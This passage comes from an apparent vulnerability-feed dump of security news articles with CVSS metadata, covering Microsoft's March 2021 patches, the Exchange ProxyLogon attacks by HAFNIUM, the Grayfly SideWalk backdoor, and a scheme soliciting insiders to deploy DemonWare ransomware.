attackers quickly incorporate those PoCs into their attack toolkits,\u201d according to Satnam Narang, staff research engineer at Tenable. \u201cWe strongly encourage all organizations that rely on Internet Explorer and Microsoft Edge (EdgeHTML-Based) to apply these patches as soon as possible.\u201d\n\n## **PoC Exploit Code Available For Windows Privilege Elevation Flaw**\n\nIn addition to the five actively exploited vulnerabilities, Microsoft issued a patch for a vulnerability in Win32K for which public PoC exploit code is also available. This flaw [ranks important in severity](<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-27077>), and exists in Windows Win32K ([CVE-2021-27077](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-27077>)). A local attacker can exploit the flaw to gain elevated privileges, according to Microsoft. While PoC exploit code is available for the flaw, the tech giant said it has not been exploited in the wild, and that exploitation is \u201cless likely.\u201d\n\n## **Other Microsoft Critical Flaws**\n\n** **Microsoft patched 14 critical vulnerabilities overall in this month\u2019s Patch Tuesday updates, including ([CVE-2021-26897](<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-26897>)), which exists in Windows DNS server and can enable remote code execution. The flaw is one out of seven vulnerabilities in Windows DNS server; the other six are rated important severity. The critical-severity flaw can be exploited by an attacker with an existing foothold on the same network as the vulnerable device; the attack complexity for such an attack is \u201clow.\u201d\n\nA critical remote code-execution flaw also exists in Microsoft\u2019s Windows Hyper-V hardware virtualization product ([CVE-2021-26867](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-26867>)), which could allow an authenticated attacker to execute code on the underlying Hyper-V server.\n\n\u201cWhile listed as a CVSS of 9.9, the vulnerability is really only relevant to those using the Plan-9 file system,\u201d said Childs. \u201cMicrosoft does not list other Hyper-V clients as impacted by this bug, but if you are using Plan-9, definitely roll this patch out as soon as possible.\u201d\n\nAnother bug of note is a remote code-execution flaw existing on Microsoft\u2019s SharePoint Server ([CVE-2021-27076](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-27076>)). The flaw can be exploited by a remote attacker on the same network as the victim, and has a low attack complexity that makes exploitation more likely, according to Microsoft.\n\n\u201cFor an attack to succeed, the attacker must be able to create or modify sites with the SharePoint server,\u201d according to Childs. \u201cHowever, the default configuration of SharePoint allows authenticated users to create sites. When they do, the user will be the owner of this site and will have all the necessary permissions.\u201d\n\n## **Microsoft Exchange Updates: Patch Now**\n\nThe Microsoft Patch Tuesday updates come as businesses grapple with existing Microsoft Exchange zero-day vulnerabilities that were previously disclosed and continue to be used in active exploits. Overall, Microsoft had released out-of-band fixes for seven vulnerabilities \u2013 four of which were the actively-exploited flaws.\n\nOn Monday, the [European Banking Authority disclosed a cyberattack](<https://www.eba.europa.eu/cyber-attack-european-banking-authority-update-2>) that it said stemmed from an exploit of the Microsoft Exchange flaw. Beyond the European Banking Authority, one recent report said [that at least 30,000 organizations](<https://krebsonsecurity.com/2021/03/at-least-30000-u-s-organizations-newly-hacked-via-holes-in-microsofts-email-software/>) across the U.S. have been hacked by attackers exploiting the vulnerability.\n\n\u201cIf you run Exchange on-premise, you need to follow the published guidance and apply the patches as soon as possible,\u201d said Childs. \u201cMicrosoft has even taken the extraordinary step of creating patches for out-of-support versions of Exchange. Ignore these updates at your own peril.\u201d\n\nAlso released on Tuesday were Adobe\u2019s security updates, [addressing a cache of critical flaws](<https://threatpost.com/adobe-critical-flaws-windows/164611/>), which, if exploited, could allow for arbitrary code execution on vulnerable Windows systems.\n\n**_Check out our free _****_[upcoming live webinar events](<https://threatpost.com/category/webinars/>)_****_ \u2013 unique, dynamic discussions with cybersecurity experts and the Threatpost community:_** \n\u00b7 March 24: **Economics of 0-Day Disclosures: The Good, Bad and Ugly **([Learn more and register!](<https://threatpost.com/webinars/economics-of-0-day-disclosures-the-good-bad-and-ugly/>)) \n\u00b7 April 21: **Underground Markets: A Tour of the Dark Economy** ([Learn more and register!](<https://threatpost.com/webinars/underground-markets-a-tour-of-the-dark-economy/>))\n", "cvss3": {}, "published": "2021-03-09T22:12:56", "type": "threatpost", "title": "Microsoft Patch Tuesday Updates Fix 14 Critical Bugs", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2021-26411", "CVE-2021-26855", "CVE-2021-26857", "CVE-2021-26858", "CVE-2021-26867", "CVE-2021-26897", "CVE-2021-27065", "CVE-2021-27076", "CVE-2021-27077"], "modified": "2021-03-09T22:12:56", "id": "THREATPOST:056C552B840B2C102A6A75A2087CA8A5", "href": "https://threatpost.com/microsoft-patch-tuesday-updates-critical-bugs/164621/", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-09-09T14:38:24", "description": "The novel backdoor technique called [SideWalk](<https://threatpost.com/sparklinggoblin-apt/168928/>), seen in campaigns targeting US media and retailers late last month, has been tied to an adversary that\u2019s been around for quite a while: namely, China-linked Grayfly espionage group.\n\nESET researchers, who named and discovered the new \u201cSparklingGoblin\u201d advanced persistent threat (APT) actor behind SideWalk, [reported](<https://www.welivesecurity.com/2021/08/24/sidewalk-may-be-as-dangerous-as-crosswalk/>) at the time that the group is an offshoot of another APT \u2013 Winnti Group \u2013 first identified in 2013 by Kaspersky.\n\nESET also said that the SideWalk backdoor is similar to one used by [Winnti](<https://threatpost.com/black-hat-linux-spyware-stack-chinese-apts/158092/>) (aka APT41, Barium, Wicked Panda or Wicked Spider, an APT [known for](<https://threatpost.com/apt41-operatives-indicted-hacking/159324/>) nation state-backed cyberespionage and financial cybercrime) called CrossWalk (Backdoor.Motnug). Both CrossWalk and SideWalk are modular backdoors used to exfiltrate system information and can run shellcode sent by the command-and-control (C2) server.\n\n[](<https://threatpost.com/infosec-insider-subscription-page/?utm_source=ART&utm_medium=ART&utm_campaign=InfosecInsiders_Newsletter_Promo/>)\n\nAccording to a [report](<https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/grayfly-china-sidewalk-malware>) published by Symantec on Thursday, the SideWalk malware has been deployed in recent Grayfly campaigns against organizations in Taiwan, Vietnam, the US and Mexico. Symantec\u2019s Threat Hunter Team has observed recent campaigns that have involved exploits targeting Exchange and MySQL servers.\n\nBesides attacking organizations in the IT, media and finance sectors, the group also has zeroed in on the telecoms sector, according to the report.\n\n## Indicted but Undeterred\n\nThe US [indicted](<https://www.justice.gov/opa/pr/seven-international-cyber-defendants-including-apt41-actors-charged-connection-computer>) several members of APT41 in September 2020, all of them Chinese residents and nationals. A Federal grand jury charged them with pulling off dozens of crimes, including allegedly facilitating \u201d the theft of source code, software code-signing certificates, customer-account data and valuable business information,\u201d which in turn \u201cfacilitated other criminal schemes, including ransomware and cryptojacking.\u201d\n\nAs the Department of Justice (DOJ) said at the time, one of the defendants \u2013 Jiang Lizhi \u2013 allegedly bragged about having a \u201cworking relationship\u201d with the Chinese Ministry of State Security: a relationship that would give him and his alleged co-conspirators a degree of state protection.\n\nAccording to Symantec researchers, the SideWalk campaign suggests that the [arrests and the publicity](<https://threatpost.com/apt41-operatives-indicted-hacking/159324/>) can\u2019t have made much of a dent in the group\u2019s activity.\n\n## **Pesky Grayfly**\n\nYou might know Grayfly better by its also-known-as\u2019s, which include GREF and Wicked Panda. Symantec said that even though the Grayfly APT is sometimes labeled APT41, its researchers consider Grayfly to be a distinct arm of APT41 that\u2019s devoted to espionage. This is similar to how Symantec separately tracks other sub-groups of APT41, such as Blackfly, the APT\u2019s cybercrime arm.\n\nGrayfly, a targeted attack group, has been around since at least March 2017, using the CrossWalk/Backdoor.Motnug (aka TOMMYGUN) backdoor. The group has also wielded a custom loader called Trojan.Chattak, Cobalt Strike (aka Trojan.Agentemis, the legitimate, commercially available tool used by network penetration testers and, increasingly, [by crooks](<https://threatpost.com/cobalt-strike-cybercrooks/167368/>)) and ancillary tools in its attacks.\n\nResearchers have seen Grayfly targeting a number of countries in Asia, Europe, and North America across a variety of industries, including food, financial, healthcare, hospitality, manufacturing and telecommunications. Recently, it\u2019s continued to torment telecoms, but it\u2019s also been going after the media, finance and IT service providers.\n\nGrayfly\u2019s typical modus operandi is to target publicly facing web servers to install web shells for initial intrusion before spreading further within the network, Symantec said. After it has penetrated a network, Grayfly then might install its custom backdoors onto more systems. That gives the operators remote access to the network and proxy connections that enable them to access hard-to-reach segments of a target\u2019s network, according to the writeup.\n\n## **Walking the Slippery SideWalk **\n\nSymantec researchers observed that in the recent SideWalk campaign, Grayfly looked to be particularly interested in attacking exposed Microsoft Exchange or MySQL servers, suggesting that \u201cthe initial vector may be the exploit of multiple vulnerabilities against public-facing servers.\u201d\n\nIn fact, the Cybersecurity & Infrastructure Security Agency (CISA) recently put out an urgent [alert](<https://us-cert.cisa.gov/ncas/current-activity/2021/08/21/urgent-protect-against-active-exploitation-proxyshell>) about a [surge in ProxyShell attacks](<https://threatpost.com/proxyshell-attacks-unpatched-exchange-servers/168879/>), as attackers launched 140 web shells against 1,900 unpatched Microsoft Exchange servers. Security researchers at Huntress reported seeing [ProxyShell vulnerabilities](<https://www.huntress.com/blog/rapid-response-microsoft-exchange-servers-still-vulnerable-to-proxyshell-exploit>) being actively exploited throughout the month of August to install backdoor access once the [ProxyShell exploit code](<https://peterjson.medium.com/reproducing-the-proxyshell-pwn2own-exploit-49743a4ea9a1>) was published on Aug. 6: A few weeks later, the surge hit.\n\nIn at least one of the SideWalk attacks that Symantec researchers observed, the suspicious Exchange activity was followed by PowerShell commands used to install an unidentified web shell. That may sound familiar, given that one of the vulnerabilities Huntress described last month was CVE-2021-34523: a bug that enables malicious actors to execute arbitrary code post-authentication on Microsoft Exchange servers due to a flaw in the PowerShell service not properly validating access tokens.\n\nThe Grayfly attackers executed the malicious SideWalk backdoor after the web shell was installed. Then, they deployed a tailor-made version of the open-source, credential-dumping tool Mimikatz that Symantec said has been used in earlier Grayfly attacks. Symantec\u2019s report does a deep dive on the technical details, including indicators of compromise.\n\nExpect more to come, researchers said, since this fly isn\u2019t likely to buzz off: \u201cGrayfly is a capable actor, likely to continue to pose a risk to organizations in Asia and Europe across a variety of industries, including telecommunications, finance, and media. It\u2019s likely this group will continue to develop and improve its custom tools to enhance evasion tactics along with using commodity tools such as publicly available exploits and web shells to assist in their attacks.\u201d\n\n**It\u2019s time to evolve threat hunting into a pursuit of adversaries. **[**JOIN**](<https://threatpost.com/webinars/threat-hunting-catch-adversaries/?utm_source=ART&utm_medium=ART&utm_campaign=September_Cybersixgill_Webinar>)** Threatpost and Cybersixgill for **[**Threat Hunting to Catch Adversaries, Not Just Stop Attacks**](<https://threatpost.com/webinars/threat-hunting-catch-adversaries/?utm_source=ART&utm_medium=ART&utm_campaign=September_Cybersixgill_Webinar>)** and get a guided tour of the dark web and learn how to track threat actors before their next attack. **[**REGISTER NOW**](<https://threatpost.com/webinars/threat-hunting-catch-adversaries/?utm_source=ART&utm_medium=ART&utm_campaign=September_Cybersixgill_Webinar>)** for the LIVE discussion on September 22 at 2 PM EST with Cybersixgill\u2019s Sumukh Tendulkar and Edan Cohen, along with researcher and vCISO Chris Roberts and Threatpost host Becky Bracken.**\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-09-09T14:30:56", "type": "threatpost", "title": "SideWalk Backdoor Linked to China-Linked Spy Group \u2018Grayfly\u2019", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-34523"], "modified": "2021-09-09T14:30:56", "id": "THREATPOST:1CEC18436389CF557E4D0F83AE022A53", "href": "https://threatpost.com/sidewalk-backdoor-china-espionage-grayfly/169310/", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-08-20T15:40:05", "description": "Researchers have discovered a Nigerian threat actor trying to turn an organization\u2019s employees into insider threats by soliciting them to deploy ransomware for a cut of the ransom profits.\n\nResearchers at Abnormal Security identified and blocked a number of emails sent earlier this month to some its customers that offered people $1 million in bitcoin to install DemonWare ransomware. The would-be attackers said they have ties to the DemonWare ransomware group, also known as Black Kingdom or DEMON, they said.\n\n\u201cIn this latest campaign, the sender tells the employee that if they\u2019re able to deploy ransomware on a company computer or Windows server, then they would be paid $1 million in bitcoin, or 40% of the presumed $2.5 million ransom,\u201d researchers wrote in a [report published Thursday](<https://abnormalsecurity.com/blog/nigerian-ransomware-soliciting-employees-demonware/>) about the campaign. \u201cThe employee is told they can launch the ransomware physically or remotely.\u201d \n[](<https://threatpost.com/infosec-insider-subscription-page/?utm_source=ART&utm_medium=ART&utm_campaign=InfosecInsiders_Newsletter_Promo/>) \nDemonWare, a Nigeria-based ransomware group, has been around for a few years. The group was last seen alongside numerous other threat actors launching [a barrage of attacks](<https://threatpost.com/microsoft-exchange-exploits-ransomware/164719/>) [targeting](<https://threatpost.com/attackers-target-proxylogon-cryptojacker/165418/>) Microsoft Exchange\u2019s [ProxyLogon](<https://threatpost.com/fbi-proxylogon-web-shells/165400/>) set of vulnerabilities, [CVE-2021-27065](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-27065>), which were discovered in March.\n\n## **Accomplice-Based Campaign**\n\nThe campaign begins with an initial email soliciting help from an employee to install ransomware while dangling the offer of payment if the person follows through. It also gives the recipient\u2014who attackers later said they found via LinkedIn\u2014a way to contact the sender of the email.\n\nResearchers from Abnormal Security did just that to find out more about the threat actor and the campaign. They sent a message back indicating that they had viewed the email and asked what they needed to do to help, they reported.\n\n\u201cA half hour later, the actor responded and reiterated what was included in the initial email, followed by a question about whether we\u2019d be able to access our fake company\u2019s Windows server,\u201d researchers wrote. \u201cOf course, our fictitious persona would have access to the server, so we responded that we could and asked how the actor would send the ransomware to us.\u201d\n\nResearchers continued to communicate over five days with the threat actors as if they were willing to be a part of the scam. \u201cBecause we were able to engage with him, we were better able to understand his motivations and tactics,\u201d they wrote in the report.\n\n## **Changing the Game**\n\nUpon being contacted, the threat actor sent researchers two links for an executable file that could be downloaded on the file-sharing sites WeTransfer or Mega.nz\n\n\u201cThe file was named \u201cWalletconnect (1).exe\u201d and based on an analysis of the file, we were able to confirm that it was, in fact, ransomware,\u201d researchers noted.\n\nThe threat actor showed flexibility in how much ransom he was willing to receive from the company, researchers said. While the original amount was $2.5 million in bitcoin, the threat actor quickly lowered that sum to $250,000 and then to $120,000 when researchers said that the fake company for which they worked had an annual revenue of $50 million.\n\n\u201cThroughout the conversation, the actor repeatedly tried to alleviate any hesitations we may have had by ensuring us that we wouldn\u2019t get caught, since the ransomware would encrypt everything on the system,\u201d researchers said. \u201cAccording to the actor, this would include any CCTV (closed-circuit television) files that may be stored on the server.\u201d\n\nThrough initial findings from research done before they opened the chain of communication, they said that the actor with whom they communicated was likely Nigerian, \u201cbased on information found on a Naira (Nigerian currency) trading website and a Russian social media platform website,\u201d they said.\n\n## **Social Engineering as Cybercrime Strategy**\n\nOverall, the experiment provided new insight and context regarding how West African threat actors\u2014who are primarily located in Nigeria\u2014\u201dhave perfected the use of social engineering in cybercrime activity,\u201d researchers said.\n\nIndeed, there long has been \u201ca blurry line\u201d between cybercrime and social engineering, observed one security professional. \u201cThis is an example of how the two are intertwined,\u201d said Tim Erlin, vice president of strategy at [Tripwire](<http://www.tripwire.com/>), of the campaign.\n\n\u201cAs people become better at recognizing and avoiding phishing, it should be no surprise to see attackers adopt new tactics to accomplish their goals,\u201d he said in an email to Threatpost.\n\nThe campaign also sheds light on how attackers leverage the idea of a disgruntled insider to try to get them to do their dirty work for them\u2014a concept that also isn\u2019t new, but can provide key insight into yet another way ransomware can find its way onto an organization\u2019s network, noted another security professional.\n\n\u201cIt is always important that ransomware victims try their best to track down how the ransomware got into their environment,\u201d Roger Grimes, data-driven-defense analyst at [KnowBe4](<http://www.knowbe4.com/>). \u201cIt is an important step. If you do not figure out how hackers, malware and ransomware are getting in, you are not going to stop them or their repeated attempts.\u201d\n", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 7.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "userInteraction": "REQUIRED", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-08-20T14:09:50", "type": "threatpost", "title": "Nigerian Threat Actors Solicit Employees to Deploy Ransomware for Cut of Profits", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-27065"], "modified": "2021-08-20T14:09:50", "id": "THREATPOST:34CC110D7F26B1B4D3B97BE05F000B69", "href": "https://threatpost.com/nigerian-solicits-employees-ransomware-profits/168849/", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}], "thn": [{"lastseen": "2022-05-09T12:39:04", "description": "[](<https://thehackernews.com/images/-LOLhcDcH4Q0/YEX4fZpKfUI/AAAAAAAAB9w/I0oQNqeVV2YmhlyC8lyvV-LztA9giv0vACLcBGAsYHQ/s0/microsoft-exchange-hacking.jpg>)\n\nMicrosoft on Friday warned of active attacks exploiting [unpatched Exchange Servers](<https://thehackernews.com/2021/03/urgent-4-actively-exploited-0-day-flaws.html>) carried out by multiple threat actors, as the hacking campaign is believed to have infected tens of thousands of businesses, government entities in the U.S., Asia, and Europe.\n\nThe company [said](<https://www.microsoft.com/security/blog/2021/03/02/hafnium-targeting-exchange-servers/>) \"it continues to see increased use of these vulnerabilities in attacks targeting unpatched systems by multiple malicious actors beyond HAFNIUM,\" signaling an escalation that the breaches are no longer \"limited and targeted\" as was previously deemed.\n\nAccording to independent cybersecurity journalist [Brian Krebs](<https://krebsonsecurity.com/2021/03/at-least-30000-u-s-organizations-newly-hacked-via-holes-in-microsofts-email-software/>), at least 30,000 entities across the U.S. \u2014 mainly small businesses, towns, cities, and local governments \u2014 have been compromised by an \"unusually aggressive\" Chinese group that has set its sights on stealing emails from victim organizations by exploiting previously undisclosed flaws in Exchange Server.\n\nVictims are also being reported from outside the U.S., with email systems belonging to businesses in [Norway](<https://nsm.no/aktuelt/oppdater-microsoft-exchange-snarest>), the [Czech Republic](<https://nukib.cz/cs/infoservis/hrozby/1692-vyjadreni-k-aktualni-situaci/>) and the [Netherlands](<https://www.ncsc.nl/actueel/nieuws/2021/maart/8/40-nl-microsoft-exchange-servers-nog-steeds-kwetsbaar>) impacted in a series of hacking incidents abusing the vulnerabilities. The Norwegian National Security Authority said it has implemented a vulnerability scan of IP addresses in the country to identify vulnerable Exchange servers and \"continuously notify these companies.\"\n\nThe colossal scale of the ongoing offensive against Microsoft's email servers also eclipses the [SolarWinds hacking spree](<https://thehackernews.com/2020/12/nearly-18000-solarwinds-customers.html>) that came to light last December, which is said to have targeted as many as 18,000 customers of the IT management tools provider. But as it was with the SolarWinds hack, the attackers are likely to have only gone after high-value targets based on an initial reconnaissance of the victim machines.\n\n### Unpatched Exchange Servers at Risk of Exploitation\n\nA successful [exploitation of the flaws](<https://unit42.paloaltonetworks.com/microsoft-exchange-server-vulnerabilities/>) allows the adversaries to break into Microsoft Exchange Servers in target environments and subsequently allow the installation of unauthorized web-based backdoors to facilitate long-term access. With multiple threat actors leveraging these zero-day vulnerabilities, the post-exploitation activities are expected to differ from one group to the other based on their motives.\n\nChief among the vulnerabilities is CVE-2021-26855, also called \"ProxyLogon\" (no connection to ZeroLogon), which permits an attacker to bypass the authentication of an on-premises Microsoft Exchange Server that's able to receive untrusted connections from an external source on port 443. This is followed by the exploitation of CVE-2021-26857, CVE-2021-26858, and CVE-2021-27065 post-authentication, allowing the malicious party to gain remote access.\n\nTaiwanese cybersecurity firm Devcore, which began an internal audit of Exchange Server security in October last year, [noted in a timeline](<https://proxylogon.com/>) that it discovered both CVE-2021-26855 and CVE-2021-27065 within a 10-day period between December 10-20, 2020. After chaining these bugs into a workable pre-authentication RCE exploit, the company said it reported the issue to Microsoft on January 5, 2021, suggesting that Microsoft had almost two months to release a fix.\n\n[](<https://thehackernews.com/images/-zR_JCeV5Moo/YEX5KX2rxLI/AAAAAAAAB94/XG6lQGCnfO0ZUBwgiwv9agIbi4TfP1csACLcBGAsYHQ/s0/microsoft-exchange-hacking.jpg>)\n\nThe four security issues in question were eventually [patched by Microsoft](<https://thehackernews.com/2021/03/urgent-4-actively-exploited-0-day-flaws.html>) as part of an emergency out-of-band security update last Tuesday, while warning that \"many nation-state actors and criminal groups will move quickly to take advantage of any unpatched systems.\"\n\nThe fact that Microsoft also patched Exchange Server 2010 suggests that the vulnerabilities have been lurking in the code for more than ten years.\n\nThe U.S. Cybersecurity and Infrastructure Security Agency (CISA), which released an [emergency directive](<https://thehackernews.com/2021/03/cisa-issues-emergency-directive-on-in.html>) warning of \"active exploitation\" of the vulnerabilities, urged government agencies running vulnerable versions of Exchange Server to either update the software or disconnect the products from their networks.\n\n\"CISA is aware of widespread domestic and international exploitation of Microsoft Exchange Server vulnerabilities and urges scanning Exchange Server logs with Microsoft's IoC detection tool to help determine compromise,\" the agency [tweeted](<https://twitter.com/USCERT_gov/status/1368216461571919877>) on March 6.\n\nIt's worth noting that merely installing the patches issued by Microsoft would have no effect on servers that have already been backdoored. Organizations that have been breached to deploy the web shell and other post-exploitation tools continue to remain at risk of future compromise until the artifacts are completely rooted out from their networks.\n\n### Multiple Clusters Spotted\n\nFireEye's Mandiant threat intelligence team [said](<https://www.fireeye.com/blog/threat-research/2021/03/detection-response-to-exploitation-of-microsoft-exchange-zero-day-vulnerabilities.html>) it \"observed multiple instances of abuse of Microsoft Exchange Server within at least one client environment\" since the start of the year. Cybersecurity firm Volexity, one of the firms credited with discovering the flaws, said the intrusion campaigns appeared to have started around January 6, 2021.\n\nNot much is known about the identities of the attackers, except that Microsoft has primarily attributed the exploits with high confidence to a group it calls Hafnium, a skilled government-backed group operating out of China. Mandiant is tracking the intrusion activity in three clusters, UNC2639, UNC2640, and UNC2643, adding it expects the number to increase as more attacks are detected.\n\nIn a statement to [Reuters](<https://www.reuters.com/article/us-usa-cyber-microsoft/more-than-20000-u-s-organizations-compromised-through-microsoft-flaw-source-idUSKBN2AX23U>), a Chinese government spokesman denied the country was behind the intrusions.\n\n\"There are at least five different clusters of activity that appear to be exploiting the vulnerabilities,\" [said](<https://twitter.com/redcanary/status/1368289931970322433>) Katie Nickels, director of threat intelligence at Red Canary, while noting the differences in the techniques and infrastructure from that of the Hafnium actor.\n\nIn one particular instance, the cybersecurity firm [observed](<https://twitter.com/redcanary/status/1367935292724948992>) that some of the customers compromised Exchange servers had been deployed with a crypto-mining software called [DLTminer](<https://www.carbonblack.com/blog/cb-tau-technical-analysis-dltminer-campaign-targeting-corporations-in-asia/>), a malware documented by Carbon Black in 2019.\n\n\"One possibility is that Hafnium adversaries shared or sold exploit code, resulting in other groups being able to exploit these vulnerabilities,\" Nickels said. \"Another is that adversaries could have reverse engineered the patches released by Microsoft to independently figure out how to exploit the vulnerabilities.\"\n\n### Microsoft Issues Mitigation Guidance\n\nAside from rolling out fixes, Microsoft has published new alternative mitigation guidance to help Exchange customers who need more time to patch their deployments, in addition to pushing out a new update for the Microsoft Safety Scanner (MSERT) tool to detect web shells and [releasing a script](<https://github.com/microsoft/CSS-Exchange/tree/main/Security>) for checking HAFNIUM indicators of compromise. They can be found [here](<https://msrc-blog.microsoft.com/2021/03/05/microsoft-exchange-server-vulnerabilities-mitigations-march-2021/>).\n\n\"These vulnerabilities are significant and need to be taken seriously,\" Mat Gangwer, senior director of managed threat response at Sophos said. \"They allow attackers to remotely execute commands on these servers without the need for credentials, and any threat actor could potentially abuse them.\"\n\n\"The broad installation of Exchange and its exposure to the internet mean that many organizations running an on-premises Exchange server could be at risk,\" Gangwer added.\n\n \n\n\nFound this article interesting? Follow THN on [Facebook](<https://www.facebook.com/thehackernews>), [Twitter _\uf099_](<https://twitter.com/thehackersnews>) and [LinkedIn](<https://www.linkedin.com/company/thehackernews/>) to read more exclusive content we post.\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-03-08T10:15:00", "type": "thn", "title": "Microsoft Exchange Cyber Attack \u2014 What Do We Know So Far?", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-26855", "CVE-2021-26857", "CVE-2021-26858", "CVE-2021-27065"], "modified": "2021-03-10T08:44:19", "id": "THN:9DB02C3E080318D681A9B33C2EFA8B73", "href": "https://thehackernews.com/2021/03/microsoft-exchange-cyber-attack-what-do.html", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-05-09T12:39:04", "description": "[](<https://thehackernews.com/images/-AxSsNt-9gYo/YD838gSOOTI/AAAAAAAAB7Q/IuSgG26w0NU-eyKMabZMnUfb7QBDyHkUgCLcBGAsYHQ/s0/ms-exchnage.jpg>)\n\nMicrosoft has [released emergency patches](<https://msrc-blog.microsoft.com/2021/03/02/multiple-security-updates-released-for-exchange-server>) to address four previously undisclosed security flaws in Exchange Server that it says are being actively exploited by a new Chinese state-sponsored threat actor with the goal of perpetrating data theft.\n\nDescribing the attacks as \"limited and targeted,\" Microsoft Threat Intelligence Center (MSTIC) said the adversary used these vulnerabilities to access on-premises Exchange servers, in turn granting access to email accounts and paving the way for the installation of additional malware to facilitate long-term access to victim environments.\n\nThe tech giant primarily attributed the campaign with high confidence to a threat actor it calls HAFNIUM, a state-sponsored hacker collective operating out of China, although it suspects other groups may also be involved.\n\nDiscussing the tactics, techniques, and procedures (TTPs) of the group for the first time, Microsoft paints HAFNIUM as a \"highly skilled and sophisticated actor\" that mainly singles out entities in the U.S. for exfiltrating sensitive information from an array of industry sectors, including infectious disease researchers, law firms, higher education institutions, defense contractors, policy think tanks and NGOs.\n\nHAFNIUM is believed to orchestrate its attacks by leveraging leased virtual private servers in the U.S. in an attempt to cloak its malicious activity.\n\nThe three-stage attack involves gaining access to an Exchange Server either with stolen passwords or by using previously undiscovered vulnerabilities, followed by deploying a web shell to control the compromised server remotely. The last link in the attack chain makes use of remote access to plunder mailboxes from an organization's network and export the collected data to file sharing sites like MEGA.\n\nTo achieve this, as many as [four zero-day vulnerabilities](<https://www.microsoft.com/security/blog/2021/03/02/hafnium-targeting-exchange-servers/>) discovered by researchers from Volexity and Dubex are used as part of the attack chain \u2014\n\n * [CVE-2021-26855](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-26855>): A server-side request forgery (SSRF) vulnerability in Exchange Server\n * [CVE-2021-26857](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-26857>): An insecure deserialization vulnerability in the Unified Messaging service\n * [CVE-2021-26858](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-26858>): A post-authentication arbitrary file write vulnerability in Exchange, and\n * [CVE-2021-27065](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-27065>): A post-authentication arbitrary file write vulnerability in Exchange\n\nAlthough the vulnerabilities impact Microsoft Exchange Server 2013, Microsoft Exchange Server 2016, and Microsoft Exchange Server 2019, Microsoft said it's updating Exchange Server 2010 for \"Defense in Depth\" purposes.\n\n[](<https://thehackernews.com/images/-_eUnJYSlv7A/YD86dcga76I/AAAAAAAAB7Y/Ex1kb11XGtcD6b878ASeDzA-SFz8SSzNgCLcBGAsYHQ/s0/ms.jpg>)\n\nFurthermore, since the initial attack requires an untrusted connection to Exchange server port 443, the company notes that organizations can mitigate the issue by restricting untrusted connections or by using a VPN to separate the Exchange server from external 